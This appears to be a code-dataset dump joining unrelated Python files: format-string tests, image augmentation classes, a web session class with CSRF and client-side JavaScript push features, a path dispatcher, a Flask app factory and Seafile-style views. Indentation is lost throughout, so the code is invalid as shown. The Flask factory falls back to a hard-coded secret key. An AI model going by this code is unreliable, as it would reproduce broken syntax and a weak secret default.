print("%06e" % float("-inf"))
print("%06e" % float("nan"))
print("%02.3d" % 123) # prec > width
print("%+f %+f" % (1.23, -1.23)) # float sign
print("% f % f" % (1.23, -1.23)) # float space sign
print("%0f" % -1.23) # negative number with 0 padding
# numbers with large negative exponents
print('%f' % 1e-10)
print('%f' % 1e-20)
print('%f' % 1e-50)
print('%f' % 1e-100)
print('%f' % 1e-300)
# large decimal precision should be truncated and not overflow buffer
# the output depends on the FP calculation so only first 2 digits are printed
# (the 'g' with small e are printed using 'f' style, so need to be checked)
print(('%.40f' % 1e-300)[:2])
print(('%.40g' % 1e-1)[:2])
print(('%.40g' % 1e-2)[:2])
print(('%.40g' % 1e-3)[:2])
print(('%.40g' % 1e-4)[:2])
| StarcoderdataPython |
1867894 | import abc
import cv2 as cv
import matplotlib.pyplot as plt
import scipy
from skimage.measure import regionprops
from tfcore.utilities.image import *
from PIL import Image
class Preprocessing():
def __init__(self):
self.functions = ([], [], [])
def add_function_x(self, user_function):
self.functions[0].append(user_function)
def add_function_y(self, user_function):
self.functions[1].append(user_function)
def add_function_xy(self, user_function):
self.functions[2].append(user_function)
def run(self, img_x, img_y):
for func in self.functions[2]:
img_x, img_y = func(img_x, img_y)
for func in self.functions[0]:
img_x, _ = func(img_x, None)
for func in self.functions[1]:
_, img_y = func(None, img_y)
return img_x, img_y
class Base():
def __init__(self, modes=[], shuffle=True):
self.shuffle = shuffle
self.modes = modes
self.idx = 0
@property
def new_index(self):
if self.shuffle:
self.idx = randint(0, len(self.modes) - 1)
else:
self.idx += 1
if self.idx >= len(self.modes) - 1:
self.idx = 0
return self.idx
@abc.abstractmethod
def function(self, img_x, img_y):
raise NotImplementedError("Please Implement this method")
def function_iterator(self, iterator):
for image_x, image_y in iterator:
img_x, img_y = self.function(image_x, image_y)
yield img_x, img_y
class Scale(Base):
def __init__(self, factors=(2, 3, 4), interp='bicubic', shuffle=True):
self.interp = interp
super().__init__(modes=factors, shuffle=shuffle)
def function(self, img_x, img_y):
shape = img_x.shape
index = self.new_index
if img_x is not None:
img_x = resize(img_x, (int(shape[0] / self.modes[index]), int(shape[1] / self.modes[index])), self.interp)
if img_y is not None:
img_y = resize(img_y, (int(shape[0]), int(shape[1])), self.interp)
return img_x, img_y
class DownScale(Base):
def __init__(self, factors=2, interp='bicubic'):
self.interp = interp
super().__init__(modes=[factors])
def function(self, img_x, img_y):
if img_x is not None:
img_x = resize(img_x, (int(img_x.shape[0] / self.modes[0]), int(img_x.shape[1] / self.modes[0])), self.interp)
if img_y is not None:
img_y = resize(img_y, (int(img_y.shape[0] / self.modes[0]), int(img_y.shape[1] / self.modes[0])), self.interp)
return img_x, img_y
class Flip(Base):
def __init__(self, direction=('horizontal', 'vertical'), shuffle=True):
super().__init__(modes=direction, shuffle=shuffle)
def function(self, img_x, img_y):
index = self.new_index
if img_x is not None:
img_x = cv.flip(img_x, index)
if img_y is not None:
img_y = cv.flip(img_y, index)
return img_x, img_y
class Rotate(Base):
def __init__(self, angle=(), steps=10, shuffle=True):
if len(angle) == 0:
angle = [steps * i for i in range(360 // steps)]
super().__init__(modes=angle, shuffle=shuffle)
def function(self, img_x, img_y):
#cv.imshow('image_in', img_x)
#cv.waitKey(0)
#cv.imshow('image_in', img_y)
#cv.waitKey(0)
index = self.new_index
if img_x is not None:
img_x = scipy.ndimage.rotate(img_x, self.modes[index], reshape=False, prefilter=False, mode='reflect')
if img_y is not None:
img_y = scipy.ndimage.rotate(img_y, self.modes[index], reshape=False, prefilter=False, mode='reflect')
#cv.imshow('image_out', img_x)
#cv.waitKey(0)
#cv.imshow('image_out', img_y)
#cv.waitKey(0)
return img_x, img_y
class Brightness(Base):
def __init__(self, shuffle=True):
super().__init__(modes=(), shuffle=shuffle)
def function(self, img_x, img_y):
min = np.min(img_x)
max = abs(256 - np.max(img_x))
value = randint(0, max + min) - min
if img_x is not None:
img_x = np.clip(img_x + value, 0, 255)
if img_y is not None:
img_y = np.clip(img_y + value, 0, 255)
cv.imshow('image', img_x)
cv.waitKey(0)
return img_x, img_y
class ToRGB(Base):
def __init__(self):
super().__init__()
def function(self, img_x, img_y):
if img_x is not None:
img_x = np.resize(img_x, (img_x.shape[0], img_x.shape[1], 3))
if img_y is not None:
img_y = np.resize(img_y, (img_y.shape[0], img_y.shape[1], 3))
return img_x, img_y
class Central_Crop(Base):
def __init__(self, size=(512,512)):
self.crop_size = size
super().__init__()
def function(self, img_x, img_y):
if img_x is not None:
y, x = img_x.shape
if x < self.crop_size[0] and y < self.crop_size[1]:
raise Exception("File size to small!")
startx = x // 2 - (self.crop_size[0] // 2)
starty = y // 2 - (self.crop_size[1] // 2)
img_x = img_x[starty:starty + self.crop_size[1], startx:startx + self.crop_size[0]]
if img_y is not None:
y, x = img_y.shape
if x < self.crop_size[0] and y < self.crop_size[1]:
raise Exception("File size to small!")
startx = x // 2 - (self.crop_size[0] // 2)
starty = y // 2 - (self.crop_size[1] // 2)
img_y = img_y[starty:starty + self.crop_size[1], startx:startx + self.crop_size[0]]
return img_x, img_y
class Crop_by_Center(Base):
def __init__(self, treshold=25, size=(256,256)):
self.crop_size = size
self.treshold = treshold
super().__init__()
def function(self, img_x, img_y):
if img_x is not None:
_, mask = cv.threshold(img_x, np.max(img_x) - self.treshold, 255, cv.THRESH_BINARY)
center_of_mass = regionprops(mask, img_x)[0].centroid
startx = int(center_of_mass[1]) - (self.crop_size[1] // 2)
starty = int(center_of_mass[0]) - (self.crop_size[0] // 2)
if startx < 0:
startx = 0
if starty < 0:
starty = 0
if startx >= img_x.shape[1] - self.crop_size[1]:
startx = img_x.shape[1] - self.crop_size[1]
if starty >= img_x.shape[1] - self.crop_size[1]:
starty = img_x.shape[1] - self.crop_size[1]
img_x = img_x[starty:starty + self.crop_size[1], startx:startx + self.crop_size[0]]
if img_y is not None:
img_y = img_y[starty:starty + self.crop_size[1], startx:startx + self.crop_size[0]]
return img_x, img_y
| StarcoderdataPython |
4807326 | """
Holds the session class for user authentication and session specific data
storage
"""
################################################################################
################################################################################
import os
import time
import datetime
import traceback
import logging, logging.handlers
import traceback
import re
import tmplbridge
import random
import weakref
import prefs
import uuid
import task
import simplejson as json
import types
import twentyc.tmpl as tmpl_engine
from twentyc.tools.thread import RunInThread
import twentyc.vodka.tools.session as vt_session
from rpc import RPC_JSON_KEYS
from wsgi import webapp
import constants
version = constants.version
AUTH_IDLE = 0
AUTH_PROCESSING = 1
AUTH_FINISHED = 2
AUTH_STATUS_XL = [
"IDLE",
"PROCESSING",
"FINISHED"
]
AUTH_FINALIZE = []
AUTH_CLEAR_FINALIZE = []
TASK_CAPACITY = {
}
################################################################################
class AuthInProgressException(Exception):
pass
class LoginInvalidException(Exception):
pass
class LoginPermsException(Exception):
def error_info(self):
return {
"log_msg" : "Login denied due to missing permissions: %s" % str(self),
"user_msg" : constants.ERR_LOGIN_PERMS
}
################################################################################
# VodkaApp session
class Session(object):
"""
User session object
"""
##############################################################################
def __init__(self, app, fromRequest, web_ses_id):
"""
Initialize the session object
app should be a reference to a VodkaApp instance
fromRequest should be a reference to _environ.get("_request")
"""
self.fromRequest = fromRequest
#reference to the VodkaApp instance
self.app = weakref.proxy(app)
#static file url
self.staticFileUrl = self.app.config.get("server", {}).get("static_file_url","/")
self.staticFileUrl = os.path.join(
self.staticFileUrl,
version
)
self.pref_manager = None
self.tmpl_engines = {}
#path to the currently selected brand directory
self.brand_path = ""
#the selected brand
self.brand = self.pick_brand(fromRequest)
#static file url (brands)
self.staticFileUrlBrand = self.staticFileUrl + "/brands/"+self.brand.get("name")
#the selected locale
self.locale = self.brand["locale"]
self.lang = self.locale.lang
#the selected theme
self.theme = self.pick_theme(fromRequest)
#error messages that can be displayed in-page or added to json output
self.messages = []
self.errors = []
#if set, the specified theme will be used instead of the picked one
self.override_theme = False
#if set, the simple theme will be forced no matter what
self.fixed_theme_forced = False
#will hold module perms for the authenticated session as it is stored
#in couchbase
self.module_perms = {}
self.module_perms_structure = {}
# a unique id identifying this session
self.client_id = ""
self.auth_id = None
self.auth_status = None
self.auth_data = None
#session id for the web sessions
self.web_ses_id = web_ses_id
#user id that was returned by successful login
self.user_id = 0
#user name that was returned by successful login
self.user = None
self.sounds = {}
self.env = None
#user agent
self.ua = fromRequest.get('user_agent').lower();
#store imported prefs for later confirmation
self.imported_prefs = None
#specifies which preference document keys the user can create / write to
self.pref_document_access = []
#holds remote code execution requirements
self.rce = {}
#holds current tasks running for this session
self.tasks = []
#holds update index data for rpc/update
self.update_index_map = {}
self.update_index_rev = {}
self.update_index_dropped = {}
##############################################################################
def rce_require(self, name, code, grace=10, limit=5):
"""
Remote code execution required.
This will execute a piece of javascript code on the user's client (browser)
When a remote code execution is sent to the client it is expecting to be
satisified via rce_satisfied(). If that fails to happen within the grace period
and request limit the session will be logged out.
name <str> unqiue name for the rce to identify it
code <str> valid javascript code to execute
grace <int> grace period between execution requests (seconds)
limit <int> if after n requests rce has not been satisified the session will
be logged out
"""
try:
if self.rce.has_key(name) or not code:
return
id = uuid.uuid4()
self.rce[name] = {
"id" : id,
"code" : code,
"time" : 0,
"limit" : limit,
"grace" : grace
}
except:
raise
##############################################################################
def rce_satisfy(self, name, id):
try:
if self.rce.has_key(name):
if str(self.rce.get(name).get("id")) == id:
del self.rce[name]
except:
raise
##############################################################################
def verify_csrf(self, request):
a = request.get('query', {});
csrf_token_a = a.get('csrfmiddlewaretoken');
csrf_token_b = webapp.get_cookie(request, "csrftoken")
if csrf_token_a != csrf_token_b or not csrf_token_b:
return False
return True
##############################################################################
# pick brand depending on host name
def pick_brand(self, request, f_brand=None):
"""
Cycle to brand map in config and see if hostname matches
any of the url
Pick brand according to hostname match
On no match pick default
if f_brand is set always use brand that matches f_brand(str) by
name
"""
host = request.get("host")
s_brand = None
#print "checking host " + host + " for brand..."
for brand, mask in self.app._brand_map.items():
if mask.match(host):
#print "got brand " + brand
s_brand = self.app.brand[brand]
#else:
#print "no brand match " + brand + " " + str(mask)
if f_brand:
if self.app.brand.get(f_brand):
s_brand = self.app.brand.get(f_brand)
if not s_brand:
s_brand = self.app.brand["default"]
dir = s_brand.get("dir")
request["session"].data["url_map"] = [
("/css", "%s/htdocs/css" % dir, "%s/htdocs/css" % self.app.brand["default"].get("dir")),
("/js", "%s/htdocs/js" % dir, "%s/htdocs/js" % self.app.brand["default"].get("dir")),
("/favicon.ico", "%s/htdocs/favicon.ico" % dir),
("favicon.ico", "%s/htdocs/favicon.ico" % dir)
]
self.brand = s_brand
self.staticFileUrlBrand = self.staticFileUrl + "/brands/"+self.brand.get("name")
self.brand_path = dir
return s_brand
##############################################################################
# pick default theme depending on user agent
def pick_theme(self, request):
"""
Select theme by useragent
"""
ua = request.get("user_agent")
for name, regex in self.app._theme_map.items():
if regex.match(ua):
return name
return self.app.config.get("app",{}).get("theme.default", "default")
##############################################################################
def uses_chrome(self):
"""
Return True if the useragent indicates that google chrome is being used
"""
if self.ua.find("chrome") != -1:
return True
else:
return False
##############################################################################
# check the user agent string to figure of if it's safari
def uses_safari(self):
"""
Return True if the useragent indicates that safari is being used
"""
if self.ua.find("safari") != -1:
return True
else:
return False
##############################################################################
# update session variables
def update(self, **kwargs):
"""
Update session variables
possible keyword arguments:
theme (str)
brand (str)
locale (locale object)
user (str), username
"""
if "theme" in kwargs:
if kwargs.get("theme") == "default" and not self.uses_chrome() and not self.uses_safari():
self.theme = "mobile"
self.fixed_theme_forced = True
else:
self.fixed_theme_forced = False
self.theme = kwargs["theme"]
if "brand" in kwargs:
self.brand = kwargs["brand"]
if "locale" in kwargs:
self.locale = kwargs["locale"]
self.lang = self.locale.lang
if "user" in kwargs:
self.user = kwargs["user"]
##############################################################################
def update_sesmap(self):
self.app.update_sesmap({ self.web_ses_id : self.auth_id or None })
##############################################################################
def get_client(self, for_duration=10):
"""
Get the first free VodkaClient instance from the app's client pool
"""
client = self.app.client_pool.get_client(for_duration)
i = 0
while not client:
client = self.app.client_pool.get_client(for_duration)
time.sleep(0.1)
i+=1
if i >= 1000:
raise Exception("No inactive clients")
return client
##############################################################################
def free_client(self, client):
"""
respawn an unused / finished cliend gotten via get_client()
"""
self.app.client_pool.respawn(client)
##############################################################################
def is_authed(self):
"""
Return True if session is authenticated, False if not
"""
return self.is_connected()
##############################################################################
# check if session is connected (has auth_id)
def is_connected(self):
"""
Return True if session's auth_id property is set, False if not
"""
if self.auth_id:
return True
return False
##############################################################################
def get_bridge(self, request=None, ignoreExpiry=False):
"""
Return TmplBridge object for the current request
"""
if not request:
request = self.fromRequest
if not request.get("bridge"):
request["bridge"] = tmplbridge.TmplBridge(self, request, ignoreExpiry)
return request.get("bridge")
##############################################################################
# append an error message
def error(self, error, toSession=False):
"""
Append error(str) to self.errors
"""
self.errors.append(error)
##############################################################################
# get all error messages and clear error message stack
def get_errors(self):
"""
Return list containing errors in self.errors
Empty self.errors
"""
e = list(self.errors)
self.errors = []
return e
##############################################################################
def auth_working(self):
if self.auth_status == AUTH_PROCESSING:
return True
else:
return False
##############################################################################
def auth_process(self, *args, **kwargs):
return 1
##############################################################################
def auth_success(self, res):
self.auth_data['result'] = res
self.auth_id = res
self.auth_finalize()
self.auth_status = AUTH_FINISHED
self.auth_data = None
self.reload_20c_module_perms()
##############################################################################
def auth_error(self, error):
self.error(error)
self.auth_cancel()
webapp.log.error(traceback.format_exc())
##############################################################################
def auth_cancel(self):
self.auth_status = AUTH_IDLE
self.auth_data = None
self.auth_id = None
##############################################################################
def auth_validate(self):
if self.auth_working():
to = self.auth_data.get("timeout", 0)
if to:
start_t = self.auth_data.get("start_t")
now = time.time()
if now - start_t > to:
self.error("Authentication timed out, please try again")
self.auth_cancel()
return False
return True
return False
##############################################################################
def auth_start(self, **kwargs):
if not self.auth_working():
self.auth_status = AUTH_PROCESSING
self.auth_data = kwargs
self.auth_data.update(start_t=time.time())
t = RunInThread(self.auth_process)
t.error_handler = self.auth_error
t.result_handler = self.auth_success
t.start(**kwargs)
else:
raise AuthInProgressException()
##############################################################################
def auth_finalize(self):
for fn in AUTH_FINALIZE:
try:
fn(self, self.auth_data)
except Exception, inst:
self.auth_cancel()
webapp.log.error(traceback.format_exc())
raise
##############################################################################
def auth_clear_process(self):
pass
##############################################################################
def auth_clear(self):
t = RunInThread(self.auth_clear_process)
t.start()
try:
for fn in AUTH_CLEAR_FINALIZE:
fn(self)
except Exception, inst:
webapp.log.error(traceback.format_exc())
finally:
self.auth_id = None
##############################################################################
def tmpl(self, name, namespace=None, request=None, tmpl_type="cheetah", theme=None, variables={}, **kwargs):
"""
load a template return it's rendered response
current supported templated tmpl_types are: "cheetah"
Templates can come from modules, the vodka barebone or brands
"""
if not theme:
theme = self.theme
#print "TMPL: %s" % namespace
if theme and namespace:
namespace = "%s.%s" % (namespace, theme)
tmpl_code = None
tmpl_path = None
self.deny_frame(request)
#if namespace is not defined, check barebone vodka templates
if not namespace:
tmpl_path = os.path.join("tmpl")
if not os.path.exists(tmpl_path):
raise Exception("Template not found: %s" % tmpl_path)
else:
# first check in the brand location
if self.brand and os.path.exists(os.path.join(self.brand.get("dir"), "tmpl", namespace, name)):
tmpl_path=os.path.join(
self.brand.get("dir"), "tmpl", namespace
)
# then check in the module template cache
elif self.app.templates.has_key("%s.%s" % (namespace, name)):
tmpl_code = self.app.templates.get("%s.%s" % (namespace, name))
if type(tmpl_code) == list:
tmpl_path = os.path.dirname(tmpl_code[0])
tmpl_code = None
tmpl = None
variables.update({
"brand_path" : self.brand_path,
"app_version" : constants.version,
"request" : self.get_bridge(request),
"_" : self.locale._,
"sf" : self.staticFileUrl,
"sfb": self.staticFileUrlBrand
})
#print "variables: %s" % variables
if not variables.has_key("headers"):
variables["headers"] = []
if tmpl_type == "cheetah":
engine = tmpl_engine.engine.CheetahEngine(tmpl_dir=tmpl_path)
elif tmpl_type == "jinja2":
engine = tmpl_engine.engine.Jinja2Engine(tmpl_dir=tmpl_path)
elif tmpl_type == "django":
engine = tmpl_engine.engine.DjangoEngine(tmpl_dir=tmpl_path)
else:
raise Exception("Unknown templating engine: %s" % tmpl_type)
if tmpl_code:
return engine._render_str_to_str(tmpl_code, env=variables)
elif tmpl_path:
return engine._render(name, env=variables)
else:
# template not found
raise Exception("Template not found: %s, %s" % (name, namespace))
#############################################################################
# set x-frame-options to deny loading this request in a frame. One reason
# to do this is to prevent clickjacking
def deny_frame(self, request):
headers = request.get("headers")
headers.extend([
("x-frame-options", "DENY"),
])
##############################################################################
def reload_20c_module_perms(self):
"""
Reload the module perms for this session
"""
if self.app.module_manager:
self.module_perms = self.app.module_manager.perms(self.auth_id)
self.module_perms_structure = vt_session.perms_structure(self.module_perms)
for namespace, level in self.app.grant_permissions.items():
if self.check_20c_module(namespace) & level:
continue
if self.module_perms.has_key(namespace):
self.module_perms[namespace] = self.module_perms.get(namespace) | level
else:
self.module_perms[namespace] = level
self.module_perms["twentyc-billing.%s.response"%self.client_id] = constants.ACCESS_READ
##############################################################################
def module_control(self,app_doc):
if self.pref_manager:
return self.pref_manager.get(app_doc).get("module_control", {});
else:
return {}
##############################################################################
def available_20c_modules(self, mobile=False):
"""
Return a list of modules that the session has access to
"""
r = [];
if mobile:
app_doc = "mobile_app"
else:
app_doc = "mobile"
module_control = self.module_control(app_doc)
for i in self.app.module_js_load_order:
mod = self.app.module_status.get(i,{})
if mobile and not mod.get("mobile"):
continue;
if not mod.get("status"):
status = 0
else:
status = int(module_control.get(i,1))
if self.check_20c_module(i):
r.append({
"name" : i,
"version" : mod.get("version"),
"status" : status
})
return r
##############################################################################
def check_20c_module(self, name, ambiguous=False):
"""
Check if session has access to the specified 20c module, return perms
"""
if self.app.module_status.has_key(name):
if self.app.module_status.get(name,{}).get("access_level",0) == 0:
return 3
if self.app.grant_permissions.has_key(name):
return self.app.grant_permissions.get(name)
if re.match("^__U\.%s\..+" % self.client_id, name):
return 0x01|0x02|0x04
if re.match("^__vodka-task-result\..+", name):
task_id = name.split(".")[1]
if task_id in self.tasks:
return 0x01
else:
return 0
if self.app.module_manager:
return self.app.module_manager.perms_check(self.module_perms, name, ambiguous=ambiguous)
##############################################################################
def reload_20c_module(self, name, version):
"""
Send remote code execution to client to reload the specified module
name <str> name of the module to reload
"""
self.rce_require(
"reload.%s" % name,
"\n".join([
"TwentyC.Modules.Load('%s', '%s');" % (name,version)
])
)
##############################################################################
def unload_20c_module(self, name):
"""
Send remote code execution to client to unload the specified module
name <str> name of the module to unload
"""
#find all modules that depend on this module.
modules = self.app.update_modules()
for mod_name,mod_status in modules.items():
if name in mod_status.get("dependencies",[]):
self.unload_20c_module(mod_name)
self.rce_require(
"unload.%s" % name,
self.app.unload_tools_code+"\n"+
"TwentyC.Modules.Unload('%s');\n" % name+
(self.app.module_javascript_component(name, comp="unload.js") or "")
)
##############################################################################
def task_run(self, moduleName, taskName, params={}, target="download", filename=None, limitResult=0, source="session"):
if self.check_20c_module(moduleName):
taskType ="%s.%s" % (moduleName, taskName)
# make sure session is not at task capacity
maxCap = TASK_CAPACITY.get(taskType, 1)
totCap = self.app.taskSessionCap
wSame, fSame = self.task_status(taskType)
wTotal, fTotal = self.task_status()
if wSame >= maxCap:
raise Exception("Please wait for the current '%s' task(s) to finish" % taskType)
if wTotal >= totCap:
raise Exception("Please wait for one of your other background tasks to finish")
id_prefix = self.client_id[:6]
self.app.log.info("Session %s... starting task: %s.%s %s" % (
id_prefix,
moduleName,
taskName,
params
))
id, p = self.app.task_run(
moduleName,
taskName,
id=self.client_id[:6],
ses=self,
target=target,
params=params,
filename=filename,
limitResult=limitResult,
source=source
)
self.tasks.append(id)
return id
##############################################################################
def task_cancel(self, id):
if id not in self.tasks:
raise Exception("Session doesn't own a task with that id")
info = self.app.task_info(id)
info.update(end_t=time.time(), status=task.FINISHED, progress="Canceled", retrieved=2)
self.app.task_terminate(id)
##############################################################################
def task_status(self, type=None):
working = 0
finished = 0
for id in self.tasks:
t = self.app.tasks.get(id)
if not t or (type and t.get("info",{}).get("type") != type):
continue
status = t.get("info",{}).get("status")
if status == task.FINISHED:
finished += 1
else:
working += 1
return (working, finished)
##############################################################################
def update_index(self, name, index, rev=None):
if type(index) == types.NoneType:
return
prev = self.update_index_map.get(name, type(index)())
if type(prev) == list:
diff = list(set(prev) - set(index))
rv = self.update_index_dropped[name] = list(set(diff + self.update_index_dropped.get(name,[])))
self.update_index_map[name] = index
crev_a, crev_b = self.update_index_rev.get(name, (0,0))
if rev > crev_a:
self.update_index_dropped[name] = []
crev_a = rev
if rev == crev_b and rv:
if not self.update_index_rev.has_key(name):
crev_a = 0
crev_b = 1
else:
crev_b += 1
self.update_index_rev[name] = (crev_a, crev_b)
return rv
elif type(prev) == dict:
dropped = {}
updated = {}
for k,v in index.items():
if prev.get(k) != v:
updated[k] = v
for k,v in prev.items():
if not index.has_key(k):
dropped[k] = v
diff = (updated, dropped)
return diff
################################################################################
################################################################################
| StarcoderdataPython |
3472386 | <reponame>ASHISHKUMAR2411/Programming-CookBook
from threading import Lock
from werkzeug.wsgi import pop_path_info, peek_path_info
from myapplication import create_app, default_app, get_user_for_prefix
class PathDispatcher(object):
def __init__(self, default_app, create_app):
self.default_app = default_app
self.create_app = create_app
self.lock = Lock()
self.instances = {}
def get_application(self, prefix):
with self.lock:
app = self.instances.get(prefix)
if app is None:
app = self.create_app(prefix)
if app is not None:
self.instances[prefix] = app
return app
def __call__(self, environ, start_response):
app = self.get_application(peek_path_info(environ))
if app is not None:
pop_path_info(environ)
else:
app = self.default_app
return app(environ, start_response)
def make_app(prefix):
user = get_user_for_prefix(prefix)
if user is not None:
return create_app(user)
application = PathDispatcher(default_app, make_app) | StarcoderdataPython |
6701290 | """
Main app/routing file for Twitoff
"""
from os import getenv
from flask import Flask, render_template, request
from .models import DB, MIGRATE, User
from twitoff.routes.home_routes import home_routes
from twitoff.routes.prediction_routes import prediction_routes
from twitoff.routes.data_routes import data_routes
def create_app():
app = Flask(__name__)
# Configurations
app.config["SECRET_KEY"] = getenv('SECRET_KEY', default="super secret")
app.config["SQLALCHEMY_DATABASE_URI"] = getenv('APP_DB_URL')
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
DB.init_app(app)
MIGRATE.init_app(app, DB)
app.register_blueprint(home_routes)
app.register_blueprint(prediction_routes)
app.register_blueprint(data_routes)
return app
| StarcoderdataPython |
11383287 | <filename>winguhub/views/__init__.py<gh_stars>0
# encoding: utf-8
import os
import stat
import simplejson as json
import re
import sys
import urllib
import urllib2
import logging
import chardet
from types import FunctionType
from datetime import datetime
from math import ceil
from urllib import quote
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.core.mail import send_mail
from django.contrib import messages
from django.contrib.sites.models import Site, RequestSite
from django.db import IntegrityError
from django.db.models import F
from django.http import HttpResponse, HttpResponseBadRequest, Http404, \
HttpResponseRedirect
from django.shortcuts import render_to_response, redirect
from django.template import Context, loader, RequestContext
from django.template.loader import render_to_string
from django.utils.hashcompat import md5_constructor
from django.utils.translation import ugettext as _
from django.utils import timezone
from django.utils.http import urlquote
from winguhub.auth.decorators import login_required
from winguhub.auth import login as auth_login
from winguhub.auth import authenticate
import seaserv
from seaserv import ccnet_rpc, ccnet_threaded_rpc, get_repos, get_emailusers, \
get_repo, get_commits, get_branches, is_valid_filename, remove_group_user,\
seafserv_threaded_rpc, seafserv_rpc, get_binding_peerids, is_repo_owner, \
get_personal_groups_by_user, is_inner_pub_repo, \
del_org_group_repo, get_personal_groups, web_get_access_token, remove_repo, \
get_group, get_shared_groups_by_repo, is_group_user, check_permission, \
list_personal_shared_repos, is_org_group, get_org_id_by_group, is_org_repo,\
list_inner_pub_repos, get_org_groups_by_repo, is_org_repo_owner, \
get_org_repo_owner, is_passwd_set, get_file_size, check_quota, edit_repo,\
get_related_users_by_repo, get_related_users_by_org_repo, \
get_session_info, get_group_repoids, get_repo_owner, get_file_id_by_path, \
set_repo_history_limit, \
get_commit, MAX_DOWNLOAD_DIR_SIZE, CALC_SHARE_USAGE, count_emailusers, \
count_inner_pub_repos, unset_inner_pub_repo, get_user_quota_usage, \
get_user_share_usage, send_message
from seaserv import wingufile_api
from pysearpc import SearpcError
from winguhub.base.accounts import User
from winguhub.base.decorators import sys_staff_required
from winguhub.base.models import UuidObjidMap, InnerPubMsg, InnerPubMsgReply
from winguhub.contacts.models import Contact
from winguhub.contacts.signals import mail_sended
from winguhub.group.forms import MessageForm, MessageReplyForm
from winguhub.group.models import GroupMessage, MessageAttachment
from winguhub.group.signals import grpmsg_added
from winguhub.notifications.models import UserNotification
from winguhub.profile.models import Profile
from winguhub.share.models import FileShare, PrivateFileDirShare
from winguhub.forms import AddUserForm, RepoCreateForm, \
RepoPassowrdForm, SharedRepoCreateForm,\
SetUserQuotaForm, RepoSettingForm
from winguhub.signals import repo_created, repo_deleted
from winguhub.utils import render_permission_error, render_error, list_to_string, \
get_httpserver_root, get_ccnetapplet_root, \
gen_dir_share_link, gen_file_share_link, get_repo_last_modify, \
calculate_repos_last_modify, get_file_type_and_ext, get_user_repos, \
EMPTY_SHA1, normalize_file_path, \
get_file_revision_id_size, get_ccnet_server_addr_port, \
gen_file_get_url, string2list, MAX_INT, IS_EMAIL_CONFIGURED, \
gen_file_upload_url, check_and_get_org_by_repo, \
get_file_contributors, EVENTS_ENABLED, get_user_events, get_org_user_events, \
get_starred_files, star_file, unstar_file, is_file_starred, get_dir_starred_files, \
get_dir_files_last_modified, show_delete_days, \
TRAFFIC_STATS_ENABLED, get_user_traffic_stat
from winguhub.utils.paginator import get_page_range
from winguhub.utils import HAS_OFFICE_CONVERTER
if HAS_OFFICE_CONVERTER:
from winguhub.utils import prepare_converted_html, OFFICE_PREVIEW_MAX_SIZE, OFFICE_PREVIEW_MAX_PAGES
import winguhub.settings as settings
from winguhub.settings import FILE_PREVIEW_MAX_SIZE, INIT_PASSWD, USE_PDFJS, FILE_ENCODING_LIST, \
FILE_ENCODING_TRY_LIST, SEND_EMAIL_ON_ADDING_SYSTEM_MEMBER, SEND_EMAIL_ON_RESETTING_USER_PASSWD, \
ENABLE_SUB_LIBRARY
# Get an instance of a logger
logger = logging.getLogger(__name__)
@login_required
def root(request):
return HttpResponseRedirect(reverse(myhome))
def validate_owner(request, repo_id):
"""
Check whether user in the request owns the repo.
"""
ret = is_repo_owner(request.user.username, repo_id)
return True if ret else False
def is_registered_user(email):
"""
Check whether user is registerd.
"""
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
user = None
return True if user else False
def access_to_repo(request, repo_id, repo_ap=None):
"""
Check whether user in the request can access to repo, which means user can
view directory entries on repo page. Only repo owner or person who is shared
can access to repo.
NOTE: This function is deprecated, use `get_user_permission`.
"""
if not request.user.is_authenticated():
token = request.COOKIES.get('anontoken', None)
return True if token else False
else:
return True if check_permission(repo_id, request.user.username) else False
def get_user_permission(request, repo_id):
if request.user.is_authenticated():
return check_permission(repo_id, request.user.username)
else:
token = request.COOKIES.get('anontoken', None)
return 'r' if token else ''
def get_file_access_permission(repo_id, path, username):
"""Check user has permission to view the file.
1. check whether this file is private shared.
2. if failed, check whether the parent of this directory is private shared.
"""
pfs = PrivateFileDirShare.objects.get_private_share_in_file(username,
repo_id, path)
if pfs is None:
dirs = PrivateFileDirShare.objects.list_private_share_in_dirs_by_user_and_repo(username, repo_id)
for e in dirs:
if path.startswith(e.path):
return e.permission
return None
else:
return pfs.permission
def get_repo_access_permission(repo_id, username):
return wingufile_api.check_repo_access_permission(repo_id, username)
def gen_path_link(path, repo_name):
"""
Generate navigate paths and links in repo page.
"""
if path and path[-1] != '/':
path += '/'
paths = []
links = []
if path and path != '/':
paths = path[1:-1].split('/')
i = 1
for name in paths:
link = '/' + '/'.join(paths[:i])
i = i + 1
links.append(link)
if repo_name:
paths.insert(0, repo_name)
links.insert(0, '/')
zipped = zip(paths, links)
return zipped
def get_repo_dirents(request, repo_id, commit, path, offset=-1, limit=-1):
dir_list = []
file_list = []
dirent_more = False
if commit.root_id == EMPTY_SHA1:
return ([], []) if limit == -1 else ([], [], False)
else:
try:
if limit == -1:
dirs = wingufile_api.list_dir_by_commit_and_path(commit.id, path, offset, limit)
else:
dirs = wingufile_api.list_dir_by_commit_and_path(commit.id, path, offset, limit + 1)
if len(dirs) == limit + 1:
dirs = dirs[:limit]
dirent_more = True
except SearpcError, e:
raise Http404
# return render_error(self.request, e.msg)
org_id = -1
if hasattr(request.user, 'org') and request.user.org:
org_id = request.user.org['org_id']
starred_files = get_dir_starred_files(request.user.username, repo_id, path, org_id)
last_modified_info = get_dir_files_last_modified(repo_id, path)
fileshares = FileShare.objects.filter(repo_id=repo_id).filter(username=request.user.username)
for dirent in dirs:
dirent.last_modified = last_modified_info.get(dirent.obj_name, 0)
dirent.sharelink = ''
if stat.S_ISDIR(dirent.props.mode):
dpath = os.path.join(path, dirent.obj_name)
if dpath[-1] != '/':
dpath += '/'
for share in fileshares:
if dpath == share.path:
dirent.sharelink = gen_dir_share_link(share.token)
dirent.sharetoken = share.token
break
dir_list.append(dirent)
else:
file_list.append(dirent)
dirent.file_size = get_file_size(dirent.obj_id)
dirent.starred = False
fpath = os.path.join(path, dirent.obj_name)
if fpath in starred_files:
dirent.starred = True
for share in fileshares:
if fpath == share.path:
dirent.sharelink = gen_file_share_link(share.token)
dirent.sharetoken = share.token
break
dir_list.sort(lambda x, y : cmp(x.obj_name.lower(),
y.obj_name.lower()))
file_list.sort(lambda x, y : cmp(x.obj_name.lower(),
y.obj_name.lower()))
if limit == -1:
return (file_list, dir_list)
else:
return (file_list, dir_list, dirent_more)
def get_unencry_rw_repos_by_user(username):
"""Get all unencrypted repos the user can read and write.
"""
def check_has_subdir(repo):
